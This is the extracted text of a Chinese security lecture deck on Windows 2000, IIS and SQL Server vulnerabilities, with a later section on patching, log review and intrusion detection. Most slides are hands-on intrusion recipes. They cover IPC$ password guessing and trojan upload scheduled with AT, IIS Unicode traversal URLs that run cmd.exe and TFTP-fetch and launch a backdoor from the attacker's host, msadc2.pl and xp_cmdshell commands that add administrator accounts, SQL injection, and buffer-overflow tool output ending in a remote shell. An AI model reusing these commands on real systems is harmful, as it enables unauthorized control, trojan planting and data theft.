系统安全漏洞与安全检测.ppt

蓝盾网络安全讲座,-张贺勋,蓝盾安全小组,系统安全漏洞与安全检测,目录 漏洞的形成 漏洞的分类 漏洞的检测工具 漏洞的防范办法 安全检测的目的 常见安全检测的内容 专业安全检测的内容,一、漏洞形成,后门：大型软件、系统的编写，是许多程序员共同完成。他们是将一个软件或系统分成若干板块，分工编写，然后再汇总，测试。最后，修补,发布。在软件汇总时，为了测试方便，程序员总会留有后门；在测试以后再进行修补这些后门，如果一旦疏忽（或是为某种目的故意留下），或是没有发现，软件发布后自然而然就成了漏洞。 程序若干板块之间的空隙：这里很容易出现连程序员的都没想到的漏洞！,蓝盾安全小组,网络协议：网络协议有TCP、UDP、ICMP、IGMP等。其实，他们本来的用途是好的，但却被别人用于不乏的活动：例如，ICMP本来是用于寻找网络相关信息，后来却被用于网络嗅探和攻击；TCP本来是用于网络传输，后来却被用于泄漏用户信息。 程序员自身的素质：程序员的自身对网络安全认识的不够，写出的程序自身就有漏洞。,二、系统漏洞的分类 操作系统漏洞 应用平台的漏洞 应用系统的漏洞 网络系统漏洞,操作系统的漏洞 弱口令 弱口令就是用户的操作密码过于简单（如123）。 描述：本漏洞的危害性极强，它可以对系统服务器作任何的操作。主要是因为管理员的安全意识不足。测试目的：用本漏洞控制服务器系统。 （1）我们可以用爆力破解工具或扫描器（XSCAN等）对机器进行扫描，可得到管理员密码。只要拥有管理员级权限，就能完全共享应用对方的机器，如下面的命令会将对方的C盘映射为自己的X盘： c:net use x: 目标主机的IP地址c$ “密码“ /user:“用户名“ 其中“c$“为系统默认共享，依此类推，同样可以共享对方的“d$“,“e$,（2）运行AT命令 。 C:net start schedule Schedule 正在启动服务. Schedulw 服务启动成功。 AT的语法： AT computername time “command“ 比如： AT computername time runnc.bat （3）用远程控制终端,输入法漏洞 描述：输入法漏洞可以说是中文Windows2000推出后的第一个致命漏洞,通过它我们可以做许多的事情,包括建立用户. 测试1：使用文件类型编辑创建管理员用户 ： 1.开机到登陆界面调出输入法,如全拼-帮助-操作指南,跳出输入法指南帮助文件 2.右击“选项“按钮,选择“跳至url“ 3.在跳至URL上添上“c:“,其它的也可. 4.帮助的右边会进入c: 5.按帮助上的“选项“按钮. 6.选“internet“选项.会启动文件类型编辑框.,7.新建一个文件类型,如一个you文件类型,在跳出的文件后缀中添上“you“.确定. 8.选中文件类型框中的“you“文件类型,点击下面的“高级按钮“,会出现文件操作对话框. 9.新建一种文件操作,操作名任意写,如“ppp“ 10.该操作执行的命令如下: C:WINNTsystem32cmd.exe /c net user mayi 123456 /add & C:WINNTsystem32cmd.exe /c net localgroup administrators aboutnt /add 完成后退出 11.将c:的某个文件如“pipi.txt“改为“pipi.txt.mayi“,然后双击打开这个文件. 12.通常这个文件是打不开的,系统运行一会便没有了提示,但这时我们已经将用户mayi加上了,权限是管理员. 13.返回,重新以aboutnt用户登录即可。,IPC$共享漏洞 描述：危害性大，主要是和其它漏洞一块使用IPC$(Inter-Process Communication)共享是NT计算机上的一个标准的隐含共享，它是用于服务器之间的通信的。NT计算机通过使用这个共享来和其他的计算机连接得到不同类型的信息的。常常可利用这一点来，通过使用空的IPC会话进行攻击。 测试1：通过本漏洞猜测用户密码 c:net use 目标机器的IP地址ipc$ /user: 当这个连接建立后，要将username和password送去加以,确认。如果你以“Administrator“登录，则需要进行口令猜测。 可以重复使用net命令，进行username和password猜测： c:net use xxx.xxx.xxx.xxxipc$ /user: 也可以使用脚本语句： open(IPC, “net use xxx.xxx.xxx.xxxipc$ /user: “); 看看目标计算机上有那些共享的资源可以用下面命令： c:net view 目标计算机的IP地址 一旦IPC$共享顺利完成，下一个命令是： c:net use g: xxx.xxx.xxx.xxxc$ 得到了C$共享，并将该目录映射到g:，键入： c:dir g: /p 就能显示这个目录的所有内容。,测试 2：通过测试1来上传木马控制服务器 c:net use ipc$ ” /user:”admin” 此时，cmd会提示命令成功完成。这样你就和建立了IPC连接。 c:copy server.exe admin$ 上传server.exe到的winnt目录，因为winnt目录里的东西比较多，管理员不容易发现，所以我们把server.exe上传到里面。Server.exe是janker写的winshell生成的程序，WinShell是一个运行在Windows平台上的Telnet服务器软件。 c:net time 这个命令可以的到的系统时间，例如是00：00 c:at 00:01 ”server.exe”,cmd会提示新加了一项任务，其作业ID为1，这样远程系统会在00:01时运行server.exe。 c:at 1 这样可以查看ID为1的作业情况。 c:net use ipc$ /delete 退出IPC连接。 现在，server.exe已经在远程主机上运行了。输入： c:telnet 21（端口可以自己在winshell中设定） 这样就成功的telnet到上了。,应用平台的漏洞 SQL SERVER存在的一些安全漏洞： “SA”帐号弱口令 描述：危害性极强，它可以完作控制系统服务器。存在“sa”帐户，密码就为空， 或密码过于简单，我们就可以通过扫描工具（如X-SCAN等）得到密码，用测试：通过XP-CMDSHEll来增加一个帐号 如：Xp_cmdshell “net user testuser /ADD “ 然后在： Xp_cmdshell “net localgroup Administrators testuser /ADD “ 这样攻击者就成功的在SQL SERVER上增加了一个用户。,当然远程的话，一般需要有1433口开着，通过MSSQL 客户端进行连接。 最后你可以用添加的用户名通过远程控制终端来控制你服务器系统。,扩展存储过程参数解析漏洞： 描述：危害性极强，它可以完作控制系统服务器。起主要问题是在MSD中提供一个API函数srv_paraminfo(),它是用来扩展存储过程调用时解释深入参数的，如: exec , , . 如要查询“c:winnt”的目录树，可以如下表达： exec xp_dirtree c:winnt 但没有检查各个参数的长度，传递相当长的字符串，就存在了覆盖其他堆栈参数的可能导致缓冲溢出。 目前已知受影响的扩展存储过程如下： xp_printstatements (xprepl.dll) xp_proxiedmetadata (xprepl.dll) xp_SetSQLSecurity (xpstar.dll) ,关于openrowset和opendatasource 描述：危害性极强，它可以完作控制系统服务器。利用openrowset发送本地命令 ,通常我们的用法是（包括MSDN的列子）如下 select * from openrowset(sqloledb,myserver;sa;,select * from table) 可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！ select * from openrowset(sqloledb,server;sa;,set fmtonly off exec master.dbo.xp_cmdshell dir c:) 必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的output集合就会提交给前面,的select显示，如果采用 默认设置，会返回空集合导致select出错，命令也就无法执行了。 那么如果我们要调用sp_addlogin呢，他不会像xp_cmdshell返回任何集合的，我们就不能再依靠fmtonly设置了，可以如下操作 select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin Hectic) 这样，命令至少会返回select OK!的集合，你的机器商会显示OK!，同时对方的数据库内也会增加一个Hectic的账号，也就是说，我们利用 select OK!的返回集合欺骗了本地的select请求，是命令能够正常执行，通理sp_addsrvrolemember和opendatasource也可以如此操作！,IIS漏洞 IIS unicode漏洞 描述:危害性极强，可以完全的控制服务器。对于IIS 5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如“%c1%hh”或者“%c0%hh”,它会首先将其解码变成:0xc10xhh，然后尝试打开这个文件，Windows 系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果 0x00 (0xc1 - 0xc0) * 0x40 + 0xhh %c0%hh - (0xc0 - 0xc0) * 0x40 + 0xhh 例如，在Windows 2000 简体中文版 + IIS 5.0 + SP1系统下测试：,http:/target/A.ida/%c1%00.ida IIS会报告说 “.ida“ 文件找不到 这里: （0xc1-0xc0)*0x40+0x00=0x40= http:/target/A.ida/%c1%01.ida IIS会报告说 “A.ida“ 文件找不到 这里: （0xc1-0xc0)*0x40+0x01=0x41=A 攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。 测试 1：下面的URL可能列出当前目录的内容： /scripts/%c1%1c%c1%1c%c1%1c%c1%1c/winnt/system32/cmd.exe?/c+dir 测试2 ：利用这个漏洞查看系统文件内容也是可能的： /a.asp/%c1%1c/%c1%1c/winnt/win.ini,测试 3： 删除空的文件夹命令： http:/x.x.x.x/scripts/%c1%1c/winnt/system32/cmd.exe?/c+rd+c:snowspider 测试 4：删除文件的命令: http:/x.x.x.x/scripts/%c1%1c/winnt/system32/cmd.exe?/c+del+c:autoexec.bak 测试 5： Copy文件 http:/xxx.xxx.xxx.xxx/scripts/%c1%1c/winnt/system32/cmd.exe?/c+copy%20c:winntrepairsam._%20c: inetpubwwwroot 测试 5： 用木马（用TFTP、NCX99） 在地址栏里填入：,/scripts/%c1%1c/winnt/system32/cmd.exe?/c+tftp -i ?.?.?.? GET ncx99.exe c:inetpubscriptssr.exe ?.?.?.?为你自己的IP， 注意：c:inetpubscriptssr.exe 其中c:inetpubscripts为主机服务器目录，要看主机的具体情况而定，sr.exe为被改名的ncx99.exe（自己选名字吧）。 然后等待.大概3分钟.IE浏览器左下角显示完成，红色漏斗消失，这时ncx99.exe已经上传到主机c:inetpubscripts目录了，您可以自己检查一下。 再使用如下调用来执行ncx99.exe(sr.exe) /scripts/%c1%1c/winnt/system32/cmd.exe?/c+c:inetpubscriptssr.exe 然后您就可以 telnet 99,printer远程缓存溢出漏洞 缓存溢出:缓存溢出又称为缓冲溢出，缓冲区指一个程序的记忆范围(领域)，该领域是用来储存一些数据，如电脑程序信息，中间计算结果，或者输入参数。把数据调入缓冲区之前，程序应该验证缓冲区有足够的长度以容纳所有这些调入的数据。否则，数据将溢出缓冲区并覆写在邻近的数据上，当它运行时，就如同改写了程序。 假如溢出的数据是随意的，那它就不是有效的程序代码，当它试图执行这些随意数据时，程序就会失败。另一方面，假如数据是有效的程序代码，程序将会按照数据提供者所设定的要求执行代码和新的功能。,描述：漏洞的活动范围是：这是一个缓存溢出漏洞，这漏洞比以往的普通溢出存在更大的危害，主要有两方面的原因： *在缺省安全的情况下，该漏洞可以被来自网络的利用。 *可以完全获得和控制存在该漏洞的网站服务器。 一旦溢出成功，他可以做他想做的一些事情，包括：安装和运行程序，重新配置服务，增加、改变或者删除文件和网页的内容等等。 漏洞的起因是：WIN2K在网络打印ISAPI扩展上缺少足够的缓冲区检查，当一个发出特殊的请求服务时产生缓存溢出，可以让在本地系统执行任意代码。 测试：通过IIS5HACK工具来检用信息,iis5hack someip 80 3 iis5 remote .printer overflow. writen by sunx for test only, dont used to hack, :p connecting. sending. Now you can telnet to 99 port good luck :) c:telnet 6 99 Microsoft Windows 2000 Version 5.00.2195 (C) Copyright 1985-2000 Microsoft Corp. C:WINNTsystem32 已经进入目标主机，你想干什么就是你的事啦。,IIS Index Server(.ida/idq) ISAPI扩展远程溢出漏洞 描述：危害性极强，它可以完作控制系统服务器。微软IIS缺省安装情况下带了一个索引服务器(Index Server,在Windows 2000下名为“Index Service“).缺省安装时，IIS支持两种脚本映射：管理脚本(.ida文件)、Inernet数据查询脚本(.idq文件)。这两种脚本都由一个ISAPI扩展 - idq.dll来处理和解释。由于idq.dll在处理某些URL请求时存在一个未经检查的缓冲区，如果攻击者提供一个特殊格式的URL,就可能引发一个缓冲区溢出。通过精心构造发送数据，攻击者可以改变程序执行流程，执行任意代码。 成功地利用这个漏洞,攻击者可以远程获取“Local System“权限。,测试:来控制服务器。运行IDQGUI程序，出现一个窗口，填好要入侵的主机IP，选取所对应的系统SP补丁栏，其他设置不改，取默认。然后按右下角的IDQ益出键。 如果成功 如图 如果不成功会提示连接错误。,连接成功后，我们打开WIN下的DOS状态，输入：NC -VV X.X.X.X 813 如果成功 如图 不成功的话可以在IDQGUI程序里换另一个SP补丁栏试试，如果都不行，就放弃。换其他漏洞机器。,4、应用系统漏洞 编程语言漏洞 MDB数据库可下载漏洞 描述：危害性强，可以得到网站的所有内容。数据库中一般存放的是客户的帐号、密码以及网站的中所有内容，如果得到了数据库，也就可以说得到了网站的一功， 原理，WEB服务器遇到不能解释的文件是就给下载， 测试：在地址栏输入http:/someurl/path/name.mdb，你会发现name.mdb的数据库给下载下来。,SQL语句漏洞 描述：危害性强，可以进入网站的后台应用程序。假设没有过滤必要的字符： select * from login where user=$HTTP_POST_VARSuser and pass=$HTTP_POST_VARSpass 我们就可以在用户框和密码框输入1 or 1=1通过验证了。这是非常古董的方法了，这个语句会替换成这样： select * from login where user=1 or 1=1 and pass=1 or 1=1 因为or 1=1成立，所以通过了。解决的办法最好就是过滤所有不必要的字符，,Jsp代码泄漏漏洞 描述：危害性强，有可能可以查看到数据库帐号密码。 在访问JSP页面时，如果在请求URL的.jsp后缀后面加上一或多个.、%2E、+、%2B、%5C、%20、%00 ，会泄露JSP源代码。测试 :查看网页源代码 http:/localhost:8080/index.jsp 服务器会正常解释。 http:/localhost:8080/index.jsp. 只要在后面加上一个.就会导致源代码泄漏(可以通过浏览器的查看源代码看到)。 原因： 由于Windows在处理文件名时，将“index.jsp“和“index.jsp.“认为是同一个文件。,CGI漏洞 x.htw or qfullhit.htw or iirturnh.htw 描述：危害性强，IIS4.0上有一个应用程序映射htw-webhits.dll，这是用于Index Server的点击功能的。尽管你不运行Index Server，该映射仍然有效。这个应用程序映射存在漏洞，允许入侵者读取本地硬盘上的文件，数据库文件，和ASP源代码。 一个攻击者可以使用如下的方法来访问系统中文件的内容： /iissamples/issamples/oop/qfullhit.htw? ciwebhitsfile=/winnt/win.ini&cirestriction=none&cihilitetype=full,就会在有此漏洞系统中win.ini文件的内容。 webhits.dll后接上“/“便可以访问到Web虚拟目录外的文件,下面我们来看个例子: http:/somerul/iissamples/issamples/oop/qfullhit.dll?CiWebHitsFile=/winnt/system32/logfiles/w3svc1/ex000121.log&CiRestriction=none&CiHiliteType=Full 在浏览器中输入该地址,便可以获得该服务器上给定日期的Web日志文件. 在系统常见的.htw样本文件有: /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/exair/search/qfullhit.htw,/iissamples/exair/search/qsumrhit.hw /iishelp/iis/misc/iirturnh.htw 这个文件通常受loopback限制 利用inetinfo.exe来调用webhits.dll,这样同样能访问到Web虚拟目录外的文件,这样请求一个.htw文件: http:/url/default.htm.htw?CiWebHitsFile=/winnt/system32/logfiles/w3svc1 /ex000121.log&CiRestriction=none&CiHiliteType=Full 这个请求肯定会失败，但请注意,我们现在已经调用到了webhits.dll,我们只要在一个存在的文件资源后面也就是在.htw前面加上一串特殊的数字( %20s ),就是在例子中default.htm后面加上这个代表空格的特殊数字,这样我们便可以欺骗过web服务器从而达到我们的目的.由于在缓冲部分中.htw文件名字部分被删除掉由于%20s这个符号,所以,当,请求传送到webhits.dll的时候,便可以成功的打开该文件,并返回给客户端,而且过程中并不要求系统中真的存在.htw文件。比如： http:/url/default.htm%20s.htw?CiWebHitsFile=/winnt/system32/logfiles/w3svc1 /ex000121.log&CiRestriction=none&CiHiliteType=Full 解决方法： hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted（突出）他们原始搜索的条目，这个文档的名字通过变量CiWebhitsfile传递给.htw文件，Webhits.dll是一个ISAPI应用程序来处理请求，打开文件并返回结果，当用户控制了CiWebhitsfile参数传递给.htw时，他们就可以请求任意文件，结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞，你可以请求如下条目：,/nosuchfile.htw 如果你从服务器端获得如下信息： format of the QUERY_STRING is invalid 这就表示你存在这个漏洞。 这个问题主要就是webhits.dll关联了.htw文件的映射，所以你只要取消这个映射就能避免这个漏洞，你可以在你认为有漏洞的系统中搜索.htw文件，一般会发现如下的程序： /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /isssamples/exair/search/qfullhit.htw /isssamples/exair/search/qsumrhit.htw /isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用),msadc 描述：IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory，默认情况下，它允许远程命令发送到IIS服务器中，这命令会以设备用户的身份运行，其一般默认情况下是SYSTEM用户。 测试：结合木马来控制服务器 C:PerlBINperl -x msadc2.pl -h 目标机xxx.xxx.xxx.xxx Please type the NT commandline you want to run (cmd /c assumed):n cmd /c 一般这里我用TFTP上传我的木马文件，但首先你得,先设置好你的TFTP主机 tftp -i get ntsrv.exe c:winntsystem32ntsrv.exe 这里 是我的TFTP主机，TFTP目录下有NTSRV。EXE木马 如果程序执行成功，TFTP会显示文件传输的进度，然后再执行PERL，将木马激活 ，你再用木马连上对方的机器，搞定 2、C:PerlBINperl -x msadc2.pl -h 目标机 cmd /c net user pt007 /add 3、C:PerlBINperl -x msadc2.pl -h 目标机 cmd /c net user pt007 ptlove 4、C:PerlBINperl -x msadc2.pl -h 目标机 cmd /c net localgroup administrators pt007 /add 5、C:PerlBINperl -x msadc2.pl -h 目标机 cmd /c c:winntsystem32ncx99.exe,uploader.exe 描述：本漏洞的危害性强，如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。 测试：上传一个木马在地址栏输入： http:/host/cgi-win/uploader.exe 会带你到上传页面,三、漏洞检测工具 商业 ISS BD-SCANNER N-STEALTH PROMISCAN 自由 HFNETCHK X-SCAN 流光,四、漏洞的解决办法 打补丁 打对应的补丁是最好的解决办法，可以到微软下载中心/downloads/search.asp下载所需的补丁。另注意以后要不断下载升级补丁。 用IIS LOCK TOOLS 防火墙,五、安全检测目地 对系统漏洞的发现 确定是否被入侵过,1、日志的检测 （1）日志的分类 操作系统 安全日志 应用程序日志 系统日志 应用系统 其它 HTTP状态代码说明,200代码表明了所有的工作一切正常，传输过程很成功 201代码表明成功发出并执行了一POST命令 202代码表明客户的命令由服务器接受以进行处理 204代码表明客户的请求得到处理，服务器不能返回数据 300代码表明客户请求的数据最近被移走 301代码表明服务器发现客户所请求的数据位于一个替代的临时重定向的URL 302代码表明服务器建议客户到一个替代的位置去请求数据 303代码表明出现了一个问题，服务器不能修改请求数据 400代码表明客户发出了一个异常的请求，因此不能被处理 401代码表明客户试图访问一个未被授权的访问的数理 403代码表明访问被禁止 404代码表明文档未找到 500表明一个服务器不能恢复的内部服务器错误 502代码表明服务器过载 目地：发现CGI漏洞入侵者，以及WEB服务的情况,安全性日志 安全性基本上捕获那些成功和失败审核事件，同时对这种事性的概述很简单。如下图,WIN2000系统日志,IIS日志,路径：c:winntsystem32logfilew3svc1,FTP日志,路径：c:winntsystem32logfileMSFTPSVC1,2、端口扫描 作用：发现木马和确定开通的服务。 工具：SUPERSCAN、PORTSCAN、 3、网络的监视 作用：发现网络攻击 工具：TCPDUMP（LINUX）、WINDUMP（WINDOWS）、命今NETSTAT,4、检查用户帐号和组信息 启动“用户管理器“程序，或者在命令行状态下执行“net user“、“net group“和“net localgroup“命令，查看当前用户和组清单，确保内置GUEST帐号被禁止使用：看看是否有非法组成员存在。默认安装后的组都具有特殊权限，例如，Administrators组成员有权对本地系统做任何事情，Backup operators组成员有权读取系统中的所有文件，PowerUsers组成员有权创建共享。不要让一些不合适的用户隐藏在这些组中。,5、定时任务中是否存在可疑程序 检查定时任务中是否存在可疑程序。攻击者可以让后门程序定时运行，以便将来重新入侵。更进一步地，要准确核对定时任务所对应的实际程序名是否合法。在命令行状态下执行“at”命令可以很方便地看到这些信息。 6、临时进程 检查是否存在临时进程。要获取这些信息，可以借助任务管理器、也可以在命令行执行pulist.exe和tlist.exe。pulist可以查看每个进程由谁启动，tlist -f 可以查看哪个进程又启动了子进程。,7、检测混杂模式的网卡 作用：确认是否被监听。 软件：PROMISCAN 嗅探行为已经成为网络安全的一个巨大威胁。通过网络嗅探，一些恶意用户能够很容易地窃取到绝密的文档和任何人的隐私。要实现上述目的非常容易，恶意用户只要从网络上下载嗅探器并安全到自己的计算机就可以了。然而，却没有一个很好的方法来检测网络上的嗅探器程序,以下将讨论使用地址解析协议(Address Resolution Protocol)报文来有效地检测网络上的嗅探器程序。,原理和检测方法: 例如：网络上一台IP地址为的PC(X)以太网地址是00-00-00-00-00-01，这台PC(X)需要向网络上另外一台IP地址为0的PC(Y)发送消息。在发送之前，X首先发出一个ARP请求包查询0对应的以太网地址。查询包的目的地址被设置为FF-FF-FF-FF-FF-FF(广播)，从而本地网络上的所有节点都可以收到这个包。收到之后，每个节点会检查这个ARP包查询的IP地址和本机的IP地址是否匹配。如果不同，就忽略这个ARP包；如果匹配(Y)就向X发出应答。X收到应答之后就缓存Y的IP/